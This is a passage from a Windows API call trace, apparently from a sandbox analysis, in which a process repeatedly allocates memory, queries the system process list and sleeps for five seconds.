BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.878] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.894] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.909] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.929] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.943] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.972] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0146.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0146.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0146.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0146.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0146.986] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0146.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0146.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.004] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.018] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.037] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.066] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.114] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.140] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.158] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.162] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.174] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.190] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.207] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0147.221] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0147.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0147.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0147.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0147.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0147.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0147.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 